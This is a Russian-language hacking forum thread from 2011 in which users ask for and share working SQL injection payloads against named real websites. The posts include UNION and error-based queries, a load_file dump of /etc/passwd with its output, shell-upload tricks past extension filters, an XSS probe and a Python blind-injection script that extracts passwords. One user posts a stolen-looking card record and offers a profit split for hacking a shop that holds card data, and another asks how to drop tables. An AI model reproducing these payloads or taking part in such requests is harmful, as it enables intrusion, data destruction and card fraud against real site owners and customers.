Просмотр полной версии : Ваши вопросы по уязвимостям.
Konqi спасибо, я так понял можно записать любой код, буду пробовать.
Вот ещё проблема
http://www.trommeslageren.dk/index2.php?id='0
ни могу подобрать поля
http://www.trommeslageren.dk/index2.php?id=-10+union+select+null,null..
ни чего не меняется
что тогда делать?
http://www.trommeslageren.dk/index2.php?id=0'+and+0+union+select+1,2,3,4,5,6,7--+
если я пишу
+UnIoN+AlL+sElEcT+TABLE_NAME+FROM+INFORMATION_SCHE MA.TABLES+LIMIT+0,1--
выдаст 1 строку
возможно ли чтобы выдало все таблицы сразу ни по 1 строке?
kroŧ said:
если я пишу
+UnIoN+AlL+sElEcT+TABLE_NAME+FROM+INFORMATION_SCHE MA.TABLES+LIMIT+0,1--
выдаст 1 строку
возможно ли чтобы выдало все таблицы сразу ни по 1 строке?
group_concat() для mysql
тока на все таблицы, а в пределах 1024 символов
krot читайте мануалы, там вы найдете все ответы на вашы вопросы
---------
на этом сайте форум ипб, смотрите в сторону форума
kroŧ said:
если я пишу
+UnIoN+AlL+sElEcT+TABLE_NAME+FROM+INFORMATION_SCHE MA.TABLES+LIMIT+0,1--
выдаст 1 строку
возможно ли чтобы выдало все таблицы сразу ни по 1 строке?
Можно и без огранечения в 1024 через IF или benchmark: /showpost.php?p=2298777&postcount=16 (https://antichat.live/showpost.php/p/2298777/postcount/16/)
KosoyRoman
10.06.2011, 19:51
d1v said:
какая версия?
3 станларт
Помогите определить БД, похоже на Postgres, но вывода не могу добиться
http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=5764+and+1=0+union+select+version()+--+
mailbrush
10.06.2011, 21:42
Может туплю, конечно, но в упор не вижу тут никакой инъекции...
mailbrush said:
Может туплю, конечно, но в упор не вижу тут никакой инъекции...
http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=5764*1
http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=5764*4
http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=5764+union+select+1+--+
http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=5764+union+select+1,2+--+
mailbrush
10.06.2011, 21:49
Туплю, туплю. Инъекция всё же есть. Но т.к. параметр page - то она, скорее всего, в операторе типа LIMIT, и через union её не получится раскрутить.
M_script
11.06.2011, 01:10
FlaktW said:
Помогите определить БД, похоже на Postgres, но вывода не могу добиться
Code:
http://www.avtogalaktika.ru/i.cgi?page=0+union+select+concat_ws(0x3a,version() ,user(),database())+--+
4.1.20:root@localhost:Site2
Code:
http://www.avtogalaktika.ru/i.cgi?page=0+union+select+load_file('/etc/passwd')+--+
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin
Здравствуйте. Я не так давно решил заняться sql injectionom, так вот у меня созрели два вопроса. Я провел sql inject узнал, узнал названние таблиц, и нужной мне ячейки, делаю такой запрос
Code:
www.сайт.com/index.php?id=-15+union+select+1,2,3,concat_ws(login,0x3a,passwor d),5,6+from+user+--+
Но логин и пароль на странице не поивился, и не выдала не какой ошибки, страница просто появилось. Version: 5.1.35.
Тоже самое я пробывал с другими таблицами, все было аналогично
Второй вопросДайте пожалуйста сылку на faq! Как провести sql injection в mysql v4.***** я на форуме не увидел не одной нормальной статьи для версии 4.***** я конечно уверен что они тут есть но найти не как не могу. Зараннее огромное спасибо.
M_script
11.06.2011, 01:31
1) Не "concat_ws(login,0x3a,password)", а "concat_ws(0x3a,login,password)" или "concat(login,0x3a,password)"
Попробуй limit добавить.
2) SQL injection полный FAQ (https://antichat.live/threads/43966/)
M_script said:
1) Не "concat_ws(login,0x3a,password)", а "concat_ws(0x3a,login,password)" или "concat(login,0x3a,password)"
Попробуй limit добавить.
я вертел по всякому и с +limit+0,1 по разному пробывал! Но данные ячеек не появлялись! Может другие варианты есть?
Code:
SQL injection полный FAQ (/thread43966.html)
этот фак я читал, и как я понил он ближе к 5-тым версиям mysql
может база не та
или unhex(hex())
Seravin said:
может база не та
или unhex(hex())
Можно по подробней? Точней пример запроса к бд
M_script said:
Code:
http://www.avtogalaktika.ru/i.cgi?page=0+union+select+concat_ws(0x3a,version() ,user(),database())+--+
4.1.20:root@localhost:Site2
Code:
http://www.avtogalaktika.ru/i.cgi?page=0+union+select+load_file('/etc/passwd')+--+
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin
Так вывод еще лучше:
http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=0+union+select+load_file('/etc/passwd')+--+
M_script
11.06.2011, 02:02
3aHyga, кинь ссылку сюда или в личку
M_script said:
3aHyga
, кинь ссылку сюда или в личку
Тут есть загвоздка! Я все делал на дедики и дедик в это время вырубился, я не знаю что там было может свет моргнул, или еще что данные сылки я утерял так как логи не сохранялись в мазиле а вспомнить не могу, а вобще это был какойто интернет магазин но не могу вспомнить сылку
вот могу еще один шоп дать там есть вывод на страницу и тд но не чего интересного там нету
_http://e-perfume.com.ar/verproducto.php?id=-180'
Только что нашол интернет магазин! в катором я на 100% уверен хроняться даные о картах, так как покупка проходит имено через этот магазин все данные вбиваются в него, на другие сайты не кидает, но там есть какойто прикол! Допустим я делаю запрос
Code:
www.сайт.com/index.php?id=15+union+select+1,@@version,3,4,5,6+--+
то сайт показывает информацыю о версии sql // - 5.0.51a-3ubuntu5
если же я делаю любой другой запрос меня перегидывает на главную страницу. Так как я еще совсем новечек и не знаю всех прелестей sql injecta кто согласится мне помоч или сам проведет sql inject конечно все 50 на 50 я согласен даже что вам 60% а мне 40 так как всю работу будите делать вы то отпишите в асю я дам данные сайта
icq 144-558-923
Либо ты делаешь неправильный запрос, либо наверняка обращаешься к information_schema и её таблицам, а на них может стоить фильтр. Попробуй выяснить в каком случае тебя перекидывает.
ps. а вообще что-то более конкретное советовать можно только увидев сайт.
Melfis said:
Либо ты делаешь неправильный запрос, либо наверняка обращаешься к information_schema и её таблицам, а на них может стоить фильтр. Попробуй выяснить в каком случае тебя перекидывает.
я делаю любой запрос меня перегидывает
когда я делаю такой запрос +union+select+1,@@version,2,3,4,5,6+--+
даны показываются остальные запросы не работают
На сайте стоит фильтр на точку и скобки, на остальное не тестил.
KosoyRoman
11.06.2011, 04:51
Кто знает как залить шелл через CNStats STD 3.0
Подскажите пожалуйста. Чем расшифровывается вот этот код
Code:
01:6B:17:69:24:CC:5B:D1:5E:A0:2F:53:3A:5D:BD:72:DB
winstrool
11.06.2011, 14:17
вроде масив HEX'a:
ki$Ì[Ñ^*/S:]½rÛ
winstrool said:
вроде масив HEX'a:
ki$Ì[Ñ^*/S:]½rÛ
я думаю не hex, так как расшифрованные данные должны быть исключительно в цифрах
вот болия полноя инфа
Code:
cc nameonca typeofcard id order_list_id expmm expyy total timeofcharge status purchaseid
01:6B:17:69:24:CC:5B:D1:5E:A0:2F:53:3A:5D:BD:72:DB Keith Stewart Visa 68 69 1A:46:8B 11:F6:FB 55.98 1257444668 Waiting to charge PFP7153633
winstrool
11.06.2011, 15:18
3aHyga said:
я думаю не hex, так как расшифрованные данные должны быть исключительно в цифрах
вот болия полноя инфа
Code:
cc nameonca typeofcard id order_list_id expmm expyy total timeofcharge status purchaseid
01:6B:17:69:24:CC:5B:D1:5E:A0:2F:53:3A:5D:BD:72:DB Keith Stewart Visa 68 69 1A:46:8B 11:F6:FB 55.98 1257444668 Waiting to charge PFP7153633
если есть доступ к исходникам, то там можно посмотреть каким алгоритмом захешированные данные...
Объясните плиз, почему так вывод есть,
http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=0+union+select+1+--+
а так нет?
http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=(0)union(select(1))+--+
как вычислить на чем стоит локалка (ОСь)
MrGergez
11.06.2011, 20:04
Почитал FAQ про использование инъекций для получения пользователя, но вот столкнулся с проблемой в таблицах ничего интересного, решил дропнуть таблицы, но вот в чем проблема как построить запрос на удаление таблиц? Нигде не нашел хотя бы примеров...
MrGergez said:
Почитал FAQ про использование инъекций для получения пользователя, но вот столкнулся с проблемой в таблицах ничего интересного, решил дропнуть таблицы, но вот в чем проблема как построить запрос на удаление таблиц? Нигде не нашел хотя бы примеров...
DROP TABLE "table_name"
только зачем!?
MrGergez
11.06.2011, 20:12
d1v said:
DROP TABLE "table_name"
только зачем!?
Тренировка и практика еще никому не мешали
MrGergez said:
Тренировка и практика еще никому не мешали
тренируйся на кошках (с)
MrGergez
11.06.2011, 20:15
Но если не трудно можете показать на примере вот здесь список таблиц
http://www.stromgren.com/products.php?id=22+and+1=0+union+select+group_conc at(table_name+separator+0x3a)+from+information_sch ema.tables+where+table_schema=0x73776173696e676572--
MrGergez
11.06.2011, 20:24
d1v said:
DROP TABLE "table_name"
А меня склоняло к мысли о TRUNCATE
SecondLife
12.06.2011, 00:05
Есть скрипт с отсутствием фильтрации в вызове функции readfile. С помощью этой уязвимости утянул исходники, но больше в них зацепиться не за что: нет инъекций, нет упоминаний админки (да и я не уверен, что она вообще существует), нет L/RFI, XSS, аворизации, системы прав, заливки файлов. Вообще ничего интересного кроме readfile. Можно ли вытянуть из этого что-то полезное?
Интересует заливка шелла.
Директивы open_basedir нет, однако (видимо из-за прав) получить файл httpd.conf не получилось.
Сайт лежит на VPS. Сайтов на сервере несколько, однако к одному IP привязан только один домен, так что через поиск сайтов по IP ничего узнать не вышло. Удалось установить наличие ещё одного сайта со своим собственным IP, однако и в его исходниках нет ничего интересного.
Есть доступ к phpinfo и некоторым файлам конфигурации.
Что можете подсказать?
SecondLife said:
Есть скрипт с отсутствием фильтрации в вызове функции readfile. С помощью этой уязвимости утянул исходники, но больше в них зацепиться не за что: нет инъекций, нет упоминаний админки (да и я не уверен, что она вообще существует), нет L/RFI, XSS, аворизации, системы прав, заливки файлов. Вообще ничего интересного кроме readfile. Можно ли вытянуть из этого что-то полезное?
Интересует заливка шелла.
Директивы open_basedir нет, однако (видимо из-за прав) получить файл httpd.conf не получилось.
Сайт лежит на VPS. Сайтов на сервере несколько, однако к одному IP привязан только один домен, так что через поиск сайтов по IP ничего узнать не вышло. Удалось установить наличие ещё одного сайта со своим собственным IP, однако и в его исходниках нет ничего интересного.
Есть доступ к phpinfo и некоторым файлам конфигурации.
Что можете подсказать?
Ты линк выложи, а мы посмотрим.
SecondLife
12.06.2011, 00:32
FlaktW said:
Ты линк выложи
Как-нибудь в другой раз. Здесь смотреть особо не на что, всю доступную инфу я озвучил, интересует направления, в которых думать дальше.
Подскажите любой рабочий способ узнать путь к файлу?
в чем тут ошибка?
?id=-4256+union select+version()+into+outfile+0x2f746d702f6c6f6c2e 747874 --
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0x2f746d702f6c6f6c2e747874 -- ORDER BY rel_id DESC LIMIT 5' at line 1
?id=-4256+union select+version()+into+outfile+'/tmp/lol.txt' --
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\'/tmp/lol.txt -- ORDER BY rel_id DESC LIMIT 5' at line 1
winstrool
12.06.2011, 12:01
kroŧ said:
Подскажите любой рабочий способ узнать путь к файлу?
в чем тут ошибка?
?id=-4256+union select+version()+into+outfile+0x2f746d702f6c6f6c2e 747874 --
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0x2f746d702f6c6f6c2e747874 -- ORDER BY rel_id DESC LIMIT 5' at line 1
?id=-4256+union select+version()+into+outfile+'/tmp/lol.txt' --
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to
use near '\\\'/tmp/lol.txt
-- ORDER BY rel_id DESC LIMIT 5' at line 1
у тебя экранируется кавычка, а для правильного вывода она не должна экранироваться, для получения пути к файлу попробуй поискать раскрытие путей, тойже самой подставкой [] к переменным.
-=Zhenek=-
12.06.2011, 14:39
подскажите..
Есть некая игра, и в ней есть флеш элемент.
Он представляет собой карту, по кторой ходишь и т.д Карта очень большая.
В коде страницы стоит ссылка не на сам элемент,а на лаудер, который грузит все остальное.. Но загрузившись 1 раз (4 метра) игра висит в кеше.
Можно ли как-то перехватить то, что лаудер грузит и получить всю карту целиком.. или как-то из кеша вытащить и разобрать флеш на код
Вытаскиваю из кеша полученные кусочки карты, но они в двоичном формате. Как его перевести в читабельный?
Как раскрутить эту скулю? У меня закончилась фантазия.
http://www.moy-teatr.ru/?place=53'
FlaktW said:
Как раскрутить эту скулю? У меня закончилась фантазия.
http://www.moy-teatr.ru/?place=53'
мускул 3..
есть сайт shock-world.com но вот никак не могу понять что за двигло, скорей всего самописное, но админку я тоже не могу найти, сканил всем чем можно, а новости они добавляют, то есть управление какое то есть, как мне вычислить не подскажете?
Да и еще, как откопать базу данных на которой стоит сайт?
foozzi said:
есть сайт
shock-world.com
но вот никак не могу понять что за двигло, скорей всего самописное, но админку я тоже не могу найти, сканил всем чем можно, а новости они добавляют, то есть управление какое то есть, как мне вычислить не подскажете?
Да и еще, как откопать базу данных на которой стоит сайт?
Host IP: 85.17.145.12
Web Server: nginx/0.8.34
Powered-by: PHP/5.2.13-pl0-gentoo
o'clock said:
Host IP: 85.17.145.12
Web Server: nginx/0.8.34
Powered-by: PHP/5.2.13-pl0-gentoo
да это и я знаю, хотелось бы информации по моему запросу
поищи соседей этого сайта,может к ним подойдёт пасс если у тебя уже всё есть
foozzi said:
есть сайт
shock-world.com
но вот никак не могу понять что за двигло, скорей всего самописное, но админку я тоже не могу найти, сканил всем чем можно, а новости они добавляют, то есть управление какое то есть, как мне вычислить не подскажете?
Да и еще, как откопать базу данных на которой стоит сайт?
Двиг - немного модифицированный Stress Web.
админка - admin.shock-world.com
БД - MySQL 5
нужна помосчь
вот есть такой запрос
Code:
bc_tovar_id=2%20%26%26%201%3D2%20UNION%20SELECT%20 1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2CCONC AT%280x6467797436%2CCONCAT_WS%280x203A20%2CVERSION %28%29%2CDATABASE%28%29%2CUSER%28%29%29%2C0x356664 6B68%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C 21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C 31%2C32%2C33%2C34%2C35%2C36%2C37%2C38%2C39%2C40%2C 41%2C42%2C43%2C44%2C45%2C46%2C47%2C48%2C49%2C50%2C 51%2C52%2C53%2C54%2C55%2C56%2C57%2C58%2C59%2C60%2C 61%2C62%2C63%2C64%2C65%2C66%2C67%2C68%2C69%2C70%2C 71%2C72%2C73%2C74%2C75%2C76%2C77%2C78%2C79%2C80%2C 81%2C82%2C83%2C84%2C85%2C86%2C87%2C88%2C89%2C90%2C 91%2C92%2C93%2C94%2C95%2C96%2C97%2C98%2C99%2C100%2 C101%2C102%2C103%2C104%2C105%2C106%2C107%2C108%2C1 09%2C110%2C111%2C112%2C113%2C114%2C115%2C116%2C117 %2C118%2C119%2C120%2C121%2C122%2C123%2C124%2C125%2 C126%2C127%2C128%2C129%2C130%2C131%2C132%2C133%2C1 34%2C135%2C136%2C137%2C138%2C139%2C140%2C141%2C142 %2C143%2C144%2C145%2C146%2C147%2C148%2C149%2C150%2 C151%20%23
он выводит и имя бд и имя юзера
но при дальнейшей крутке
не выводит имена таблиц при таком запросе
Code:
bc_tovar_id=2%20%26%26%201%3D2%20UNION%20SELECT%20 1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2CCONC AT%280x6467797436%2CCONCAT_WS%280x203A20%2CTABLE_S CHEMA%2CTABLE_NAME%29%29%2C0x3566646B68%29%2C13%2C 14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C 24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C 34%2C35%2C36%2C37%2C38%2C39%2C40%2C41%2C42%2C43%2C 44%2C45%2C46%2C47%2C48%2C49%2C50%2C51%2C52%2C53%2C 54%2C55%2C56%2C57%2C58%2C59%2C60%2C61%2C62%2C63%2C 64%2C65%2C66%2C67%2C68%2C69%2C70%2C71%2C72%2C73%2C 74%2C75%2C76%2C77%2C78%2C79%2C80%2C81%2C82%2C83%2C 84%2C85%2C86%2C87%2C88%2C89%2C90%2C91%2C92%2C93%2C 94%2C95%2C96%2C97%2C98%2C99%2C100%2C101%2C102%2C10 3%2C104%2C105%2C106%2C107%2C108%2C109%2C110%2C111% 2C112%2C113%2C114%2C115%2C116%2C117%2C118%2C119%2C 120%2C121%2C122%2C123%2C124%2C125%2C126%2C127%2C12 8%2C129%2C130%2C131%2C132%2C133%2C134%2C135%2C136% 2C137%2C138%2C139%2C140%2C141%2C142%2C143%2C144%2C 145%2C146%2C147%2C148%2C149%2C150%2C151%20FROM%20i nformation_schema.tables%20WHERE%20TABLE_SCHEMA%3C %3E0x696e666f726d6174696f6e5f736368656d61%20%23
может кто посодействовать?
Не работал практически с Oracle , да и еще походу full blind имею. полез смотреть что сегодня в моде из автоматики , нашел sqlmap , поковырявшись выставил --level=5 и --risk=3 . В итоге что с дефолтными настройками что так , линковые параметры он считает не уязвимыми . Хотя со мной солидарны несколько утилит типа Acunetix . На выводе при подстановке банальной кавычки получаю :
ORA-06502: PL/SQL: : ошибка преобразования символа в число ошибка числа или значения ORA-06512: на "имя_таблицы или колонки", line 2271 ORA-06512: на "имя_таблицы или колонки", line 1280
Собстно чем еще попробовать можно ?
Как называется это уязвимость, пример:
http://www.rcnz.org.nz/email.php?e=
скажите пожалуйста, как это можно использовать?
kroŧ said:
Как называется это уязвимость, пример:
http://www.rcnz.org.nz/email.php?e=
скажите пожалуйста, как это можно использовать?
там фильтрация <>
там вроде нет ничего
http://www.rcnz.org.nz/about/church-edit-password.php
мб поможет, я хз
да и вот еще http://www.rcnz.org.nz/search.php?query='
пишет Loading но ничего не выводит, остальное фильтрирует
Faaax said:
нужна помосчь
вот есть такой запрос
Code:
bc_tovar_id=2%20%26%26%201%3D2%20UNION%20SELECT%20 1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2CCONC AT%280x6467797436%2CCONCAT_WS%280x203A20%2CVERSION %28%29%2CDATABASE%28%29%2CUSER%28%29%29%2C0x356664 6B68%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C 21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C 31%2C32%2C33%2C34%2C35%2C36%2C37%2C38%2C39%2C40%2C 41%2C42%2C43%2C44%2C45%2C46%2C47%2C48%2C49%2C50%2C 51%2C52%2C53%2C54%2C55%2C56%2C57%2C58%2C59%2C60%2C 61%2C62%2C63%2C64%2C65%2C66%2C67%2C68%2C69%2C70%2C 71%2C72%2C73%2C74%2C75%2C76%2C77%2C78%2C79%2C80%2C 81%2C82%2C83%2C84%2C85%2C86%2C87%2C88%2C89%2C90%2C 91%2C92%2C93%2C94%2C95%2C96%2C97%2C98%2C99%2C100%2 C101%2C102%2C103%2C104%2C105%2C106%2C107%2C108%2C1 09%2C110%2C111%2C112%2C113%2C114%2C115%2C116%2C117 %2C118%2C119%2C120%2C121%2C122%2C123%2C124%2C125%2 C126%2C127%2C128%2C129%2C130%2C131%2C132%2C133%2C1 34%2C135%2C136%2C137%2C138%2C139%2C140%2C141%2C142 %2C143%2C144%2C145%2C146%2C147%2C148%2C149%2C150%2 C151%20%23
он выводит и имя бд и имя юзера
но при дальнейшей крутке
не выводит имена таблиц при таком запросе
Code:
bc_tovar_id=2%20%26%26%201%3D2%20UNION%20SELECT%20 1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2CCONC AT%280x6467797436%2CCONCAT_WS%280x203A20%2CTABLE_S CHEMA%2CTABLE_NAME%29%29%2C0x3566646B68%29%2C13%2C 14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C 24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C 34%2C35%2C36%2C37%2C38%2C39%2C40%2C41%2C42%2C43%2C 44%2C45%2C46%2C47%2C48%2C49%2C50%2C51%2C52%2C53%2C 54%2C55%2C56%2C57%2C58%2C59%2C60%2C61%2C62%2C63%2C 64%2C65%2C66%2C67%2C68%2C69%2C70%2C71%2C72%2C73%2C 74%2C75%2C76%2C77%2C78%2C79%2C80%2C81%2C82%2C83%2C 84%2C85%2C86%2C87%2C88%2C89%2C90%2C91%2C92%2C93%2C 94%2C95%2C96%2C97%2C98%2C99%2C100%2C101%2C102%2C10 3%2C104%2C105%2C106%2C107%2C108%2C109%2C110%2C111% 2C112%2C113%2C114%2C115%2C116%2C117%2C118%2C119%2C 120%2C121%2C122%2C123%2C124%2C125%2C126%2C127%2C12 8%2C129%2C130%2C131%2C132%2C133%2C134%2C135%2C136% 2C137%2C138%2C139%2C140%2C141%2C142%2C143%2C144%2C 145%2C146%2C147%2C148%2C149%2C150%2C151%20FROM%20i nformation_schema.tables%20WHERE%20TABLE_SCHEMA%3C %3E0x696e666f726d6174696f6e5f736368656d61%20%23
может кто посодействовать?
url decode сделал хотя бы...
а вообще предположу что надо либо group_concat либо limit использовать
так выводит http://exange.shock-world.com/?page=19&id=6&clan_id=268558626
так неводит http://exange.shock-world.com/?page='19&id=6&clan_id=antichat
то есть пустая страница
скажите есть ченить тут?
foozzi said:
так выводит http://exange.shock-world.com/?page=19&id=6&clan_id=268558626
так неводит http://exange.shock-world.com/?page=
'
19&id=6&clan_id=
antichat
то есть пустая страница
скажите есть ченить тут?
нет там ничего.
каждые каникулы возникают вопросы по взлому линейки
zlo12 said:
нет там ничего.
каждые каникулы возникают вопросы по взлому линейки
хм... причем тут взлом "линейки"? бд этого сервера стоит оочень не мало, и она уже сливалась в 2007 году
Подскажите плыз как разкрутить подобную скулю http://uzmob.uz/profile.php?mode=viewprofile&u=692
В чем причина?
Так выводится:
http://www.liftnn.ru/page.php?path=0.25)+or+(SeLect+count(*)+from+(sele ct+1+UnIoN+select+2+UnIoN+select+3)x%20+group+by+c oncat(version(),floor(rand(0)*2)))%23
Duplicate entry '5.1.41-log1' for key 'group_key'
а, так нет:
http://www.liftnn.ru/page.php?path=0.25)+or+1+group+by+concat((select+/*!table_name*/+/*!from*/+/*!information_schema*/./*!tables*/+/*!limit*/+0,1),floor(rand(0)*2))/*!having*/+count(*)+or+1%23
qaz said:
Подскажите плыз как разкрутить подобную скулю http://uzmob.uz/profile.php?mode=viewprofile&u=692
сам не смог ничего сделать, пробовалв sqlhelper'e он тоже ничего не сделал кроме того что определил что это sql union inj
И у меня есть пару вопросов
есть сайт, просканил директории нашол файл .bash_history
открыл его там такое:
Code:
crontab -e
svs@a18-swforum ~ $ crontab -e
crontabs/svs: Permission denied
ls -la
ps aux
ps aux
ps aux
ps aux
ps aux
crontab -e
man crontab
exit
что это? И если на сайте отображается код JS ну например открываю ссылку site.com/pngfix.js оно мне выдает код скрипта, это нормально?
и последнее:
перебираю страницы на сайте и наткнулся на такое:
http://site.com/?id=7 страница выдала
Code:
can't select db: Could not locate entry in sysdatabases for database 'название базы'. No entry found with that name. Make sure that the name is entered correctly.
сканил сайт сканером WVS он выдал что здесь http://forum.shock-world.com/journal.php?"onmouseover=prompt(987671)>
XSS но я в них мало шарю, что с нее выжать можно?
вобщем есть за что хвататься?
FlaktW said:
В чем причина?
Так выводится:
http://www.liftnn.ru/page.php?path=0.25)+or+(SeLect+count(*)+from+(sele ct+1+UnIoN+select+2+UnIoN+select+3)x%20+group+by+c oncat(version(),floor(rand(0)*2)))%23
Duplicate entry '5.1.41-log1' for key 'group_key'
а, так нет:
http://www.liftnn.ru/page.php?path=0.25)+or+1+group+by+concat((select+/*!table_name*/+/*!from*/+/*!information_schema*/./*!tables*/+/*!limit*/+0,1),floor(rand(0)*2))/*!having*/+count(*)+or+1%23
http://www.liftnn.ru/page.php?path=0.25
там точка используется для разбиения переданного параметра, поэтому второй запрос и не работает
http://www.liftnn.ru/page.php?path=3)+or+1+group+by+concat((select+123+ from+pages+limit+0,1),floor(rand(0)*2))having+min( 0)+or+1%23 работает
http://www.liftnn.ru/page.php?path=3)+or+1+group+by+concat((select+123+ from+sttsnn_lift2.pages+limit+0,1),floor(rand(0)*2 ))having+min(0)+or+1%23 не работает, т.к. точкой разбили запрос
бруть таблицы либо ищи способ обойтись без точки
Optik-Crack
15.06.2011, 12:40
Бывают 2 вида скуль инъекции это обычные и слепые, но все они находятся по разному, киньте ссылки на статьи к способам их нахождения.
Optik-Crack said:
Бывают 2 вида скуль инъекции это обычные и слепые, но все они находятся по разному, киньте ссылки на статьи к способам их нахождения.
SQL injection полный FAQ [Dr.Z3r0] (https://antichat.live/threads/43966/)
SQL инъекция (в т.ч. и blind SQL) [kot777] (https://antichat.live/threads/19844/)
Быстрый Blind SQL Injection [Qwazar] (http://forum.antichat.su/threadnav119047-1-10.html)
А поиск для чего??
Seravin said:
url decode сделал хотя бы...
а вообще предположу что надо либо group_concat либо limit использовать
пробовал group_concat либо limit не выводит ничего
есть уязвимый сервер, могу заливать все типы файлов кроме:
$Config['DeniedExtensions']['File'] = array('php','asp','aspx','ascx','jsp','cfm','cfc', 'pl','bat','exe','dll','reg') ;
пробовал php3, phtml, xinc, различные комбинации по типу php.jpg, не выполняются, а скачиваются
сервер под nginx, поэтому htaccess не пойдет
lfi не нашел
что можно еще поробовать?
кусок уязвимого кода
";
echo $row["username"];
echo "";
echo $row["visits"];
echo "";
}
echo "";
?>
структура таблицы
CREATE TABLE `tb_users` (
`id` int(11) NOT NULL auto_increment,
`username` varchar(15) NOT NULL,
`password` varchar(100) NOT NULL,
`ip` varchar(15) NOT NULL,
`email` varchar(150) NOT NULL,
`pemail` varchar(150) NOT NULL,
`referer` varchar(15) NOT NULL,
`country` varchar(150) NOT NULL,
`visits` varchar(150) NOT NULL default '0',
`referals` varchar(150) NOT NULL default '0',
`referalvisits` varchar(150) NOT NULL default '0',
`money` varchar(150) NOT NULL default '0.00',
`paid` varchar(150) NOT NULL default '0.00',
`joindate` varchar(150) NOT NULL,
`lastlogdate` varchar(150) NOT NULL,
`lastiplog` varchar(150) NOT NULL,
`account` varchar(150) NOT NULL,
`user_status` varchar(15) NOT NULL default 'user',
KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=cp1251 AUTO_INCREMENT=20 ;
чему должна быть равна переменная $lole для вывода password where username admin?
vaddd said:
кусок уязвимого кода
структура таблицы
чему должна быть равна переменная $lole для вывода password where username admin?
Должно быть mq = off;
Попробуй
Cookie: UsNick = ' union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8 from tb_users where username='admin'-- 1
Скинь ссылку в пм. Догадываюсь что за движок (bux какой-то).
Фараон said:
Должно быть mq = off;
Попробуй
Cookie: UsNick = ' union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8 from tb_users where username='admin'-- 1
Скинь ссылку в пм. Догадываюсь что за движок (bux какой-то).
inurl:advertisewmz.php
уязвимый сценарий referals.php, он в той же папке
спасибо за ответ, попробую завтра
принтабельные цифры будут 2,9?
freezed said:
есть уязвимый сервер, могу заливать все типы файлов кроме:
$Config['DeniedExtensions']['File'] = array('php','asp','aspx','ascx','jsp','cfm','cfc', 'pl','bat','exe','dll','reg') ;
пробовал php3, phtml, xinc, различные комбинации по типу php.jpg, не выполняются, а скачиваются
сервер под nginx, поэтому htaccess не пойдет
lfi не нашел
что можно еще поробовать?
Попробуй что нибудь из этого
Минифак по загрузке php кода вместо картинок (https://rdot.org/forum/showpost.php?p=1142&postcount=6)
Подскажите плыз как разкрутить подобную скулю http://uzmob.uz/profile.php?mode=viewprofile&u=692
qaz said:
Подскажите плыз как разкрутить подобную скулю http://uzmob.uz/profile.php?mode=viewprofile&u=692
Там нет скули.
FlaktW said:
Там нет скули.
какето?
http://uzmob.uz/profile.php?mode=viewprofile&u=692'
Could not update user data.
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 3
UPDATE phpbb_users SET user_profile_view = '1' WHERE user_id =
Line : 27
File : usercp_viewprofile.php
qaz said:
какето?
http://uzmob.uz/profile.php?mode=viewprofile&u=692'
Could not update user data.
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 3
UPDATE phpbb_users SET user_profile_view = '1' WHERE user_id =
Line : 27
File : usercp_viewprofile.php
Это не значит, что там есть скуля
Не могу запустить сплойт.
Code:
#!/usr/bin/python
#-*- coding: utf-8 -*-
# coded by BlueH4G _http://blueh4g.org_
import urllib,re
from time import sleep
def main() :
chk = re.compile("true_title")
url_begin="
http://t.blueh4g.org/technote7/board.php?board=freeboard&sort=(case%20("
url_end=")%20when%20true%20then%20no%20else%20uid%20end)%20 asc%20limit%200,1%23"
result="result : "
for spos in range(1,14):
ch=0
for i in range(1,8) :
sleep(0.05)
query="select%20substr((select%20lpad(bin(ascii(substr(m_ pass,"+str(spos)+",1))),7,0)%20from%20a_tn3_memberboard_list%20order %20by%20m_level%20desc%20limit%200,1),"+str(i)+",1)=1
data=urllib.urlopen(url_begin + query + url_end)
text=data.read()
if chk.search(text) :
ch += 2**(7-i)
result+=chr(ch)
print result
main()
C:\Python27>root.py
File "C:\Python27\root.py", line 9
